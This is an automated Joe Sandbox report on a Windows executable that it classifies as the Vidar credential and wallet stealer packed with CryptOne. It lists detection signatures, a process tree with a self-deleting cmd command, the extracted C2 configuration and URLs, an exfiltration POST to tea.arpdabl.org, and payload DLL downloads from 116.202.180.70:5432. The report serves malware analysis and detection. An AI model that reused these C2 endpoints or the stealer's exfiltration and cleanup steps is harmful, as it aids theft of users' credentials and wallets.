Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
82xul16VKj.exe

Overview

General Information

Sample name:82xul16VKj.exe
renamed because original name is a hash value
Original sample name:07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957.exe
Analysis ID:1466531
MD5:eb2f14b68aa11a4aea94985c87714811
SHA1:2fa340debaa9fbe53ad934403d64a827ddde9445
SHA256:07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957
Infos:

Detection

CryptOne, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

  • System is w7x64
  • 82xul16VKj.exe (PID: 2112 cmdline: "C:\Users\user\Desktop\82xul16VKj.exe" MD5: EB2F14B68AA11A4AEA94985C87714811)
    • kat2B07.tmp (PID: 204 cmdline: C:\Users\user\AppData\Local\Temp\kat2B07.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)
      • cmd.exe (PID: 640 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit MD5: AD7B9C14083B52BC532FBA5948342B98)
        • timeout.exe (PID: 1240 cmdline: timeout /t 10 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199730044335", "https://t.me/bu77un"], "Botnet": "67fd81bf99f2a8aaa5bc79a1cfb25860"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
    00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            0.2.82xul16VKj.exe.3080000.4.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.2.82xul16VKj.exe.3080000.4.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.2.82xul16VKj.exe.2eb7719.3.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.82xul16VKj.exe.2eb7719.3.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.82xul16VKj.exe.2a0000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      Click to see the 1 entries
                      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\kat2B07.tmp, ProcessId: 204, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 82xul16VKj.exeAvira: detected
                      Source: https://steamcommunity.com/profiles/76561199730044335Avira URL Cloud: Label: malware
                      Source: https://t.me/bu77unAvira URL Cloud: Label: malware
                      Source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199730044335", "https://t.me/bu77un"], "Botnet": "67fd81bf99f2a8aaa5bc79a1cfb25860"}
                      Source: survey-smiles.comVirustotal: Detection: 8%Perma Link
                      Source: http://survey-smiles.com/RVirustotal: Detection: 12%Perma Link
                      Source: http://survey-smiles.com/Virustotal: Detection: 8%Perma Link
                      Source: http://survey-smiles.com/zVirustotal: Detection: 10%Perma Link
                      Source: 82xul16VKj.exeVirustotal: Detection: 39%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
                      Source: 82xul16VKj.exeJoe Sandbox ML: detected
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: I8S%
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: usernameField
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: a GX Stable
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: uctName
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: layVersion
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: sktop\
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: F783D5D3EF8C*
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: T=@?VDX;W:R1J )M$
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: #5EG P%:{
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: ystemInfo
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: 304FDQ8L\h$
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: %hu/%hu
                      Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpackString decryptor: ero\wallet.k9ys
                      Source: 82xul16VKj.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49161 version: TLS 1.2
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199730044335
                      Source: Malware configuration extractorURLs: https://t.me/bu77un
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 116.202.180.70:5432
                      Source: global trafficHTTP traffic detected: GET /bu77un HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
                      Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                      Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: tea.arpdabl.orgContent-Length: 4761Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: survey-smiles.comConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.202.180.70
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JEVOW3XT.htmJump to behavior
                      Source: global trafficHTTP traffic detected: GET /bu77un HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: survey-smiles.comConnection: Keep-AliveCache-Control: no-cache
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: t.me
                      Source: global trafficDNS traffic detected: DNS query: tea.arpdabl.org
                      Source: global trafficDNS traffic detected: DNS query: survey-smiles.com
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: tea.arpdabl.orgContent-Length: 4761Connection: Keep-AliveCache-Control: no-cache
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: kat2B07.tmp, 00000002.00000003.356734139.0000000000946000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.356820905.0000000000948000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.356654978.0000000000942000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.366603952.0000000000942000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.360869270.0000000000944000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/envx
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000000.341903981.00000000004B4000.00000002.00000001.01000000.00000004.sdmp, kat2B07.tmp.0.drString found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com/R
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com/z
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.org
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.org/)
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.org/v
                      Source: kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.org5432Content-Disposition:
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.orgHJK
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70/2
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70/I
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432
                      Source: kat2B07.tmp, 00000002.00000003.369794652.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.371917226.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/2r
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/freebl3.dll
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/mozglue.dll
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/msvcp140.dll
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/nss3.dll
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/softokn3.dll%
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/softokn3.dllP
                      Source: kat2B07.tmp, 00000002.00000003.371917226.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/sqlt.dll
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432/vcruntime140.dll
                      Source: kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.180.70:5432Content-Disposition:
                      Source: BAEBGC.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: BAEBGC.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: BAEBGC.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: BAEBGC.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: BAEBGC.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: BAEBGC.2.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: BAEBGC.2.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199730044335
                      Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/bu77un
                      Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/bu77unguf_hMozilla/5.0
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                      Source: kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: BAEBGC.2.drString found in binary or memory: https://www.google.com/favicon.ico
                      Source: BGDGHJ.2.drString found in binary or memory: https://www.google.com/search?q=net
                      Source: BGDGHJ.2.drString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                      Source: BGDGHJ.2.drString found in binary or memory: https://www.google.com/search?q=wmf
                      Source: kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425244038.000000000026F000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, BGDGHJ.2.drString found in binary or memory: https://www.google.com/sorry/index
                      Source: BGDGHJ.2.drString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                      Source: BGDGHJ.2.drString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                      Source: kat2B07.tmp, 00000002.00000003.383481823.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, BGDGHJ.2.drString found in binary or memory: https://www.google.com/sorry/indextest
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49161 version: TLS 1.2
                      Source: Yara matchFile source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\82xul16VKj.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
